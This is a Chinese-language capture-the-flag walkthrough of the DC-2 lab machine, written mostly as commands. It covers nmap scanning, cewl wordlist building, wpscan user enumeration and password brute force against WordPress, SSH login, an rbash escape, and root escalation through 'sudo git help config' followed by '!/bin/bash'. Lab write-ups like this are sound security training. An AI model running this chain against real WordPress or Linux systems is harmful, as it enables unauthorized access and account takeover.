一,靶场搭建
DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip
搭建过程和DC-1一样,将kali跟DC-2放同一网段即可
kali和dc-1都是NAT模式
二,渗透测试
第一个flag
主机探活
nmap -sV 192.168.75.0/24
192.168.75.130最有可能是靶机
进一步扫描
nmap -A -p- -v 192.168.75.130
发现开放80端口和7744端口
依据官方文档提示访问80端口需要在/etc/hosts文件中添加解析
火狐浏览器中输入http://dc-2,访问成功
拿到第一个flag
第二个flag
翻译第一个flag提示cewl
cewl:Kali Linux字典生成工具Cewl
cewl dc-2 -w pass.txt
cat pass.txt
生成字典做什么?爆破 寻找爆破点
nikto -url http://dc-2 -c all
或者
dirb http://dc-2
扫描到一个http://dc-2/wp-admin/,访问一下出现登陆页面
尝试爆破
但是缺少用户名字典,用wpscan进行用户枚举,再配合密码字典会提高效率
得到以下三个用户名,写进一个用户名字典
wpscan --url http://dc-2 -e u
vim user.txt
字典都有了,接下来就是爆破
wpscan --url http://dc-2 -U user.txt -P pass.txt
得到两个用户名和对应的密码
去http://dc-2/wp-admin/页面登录尝试
jerry账户中有flag,tom账户中没有
提示
第三个flag
ssh:7744端口还没有用到,用得到的账号密码连接7744端口
只有tom可以连接
看一看自己是谁,权限是怎样的,可以使用的命令
rbash是Restricted bash缩写,即受限制的bash。
管理员可通过指定普通用户的bash为rbash,以此来限制相关操作。
在rbash中,很多行为和命令都会被受到限制。
ls
less flag3.txt
vi flag3.txt
第四个flag
第三个flag提示我们我们使用su来切换到jerry来找到进一步的线索
rbash有限制就绕过rbash的限制
调用/bin/sh命令解释器
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin
su jerry
find / -name flag4.txt
cat /home/jerry/flag4.txt
第五个flag
git很扎眼,虽然他让我滚出去!!!
输入sudo -l发现可以使用git命令,可以使用root权限,但不需要root密码
用git提权
用root权限调用命令git,进入help配置文件
sudo git help config
!/bin/bash
!/bin/sh
sudo git help add
!/bin/bash
!/bin/sh
whoami
passwd root #修改root密码
cat final-flag.txt
well done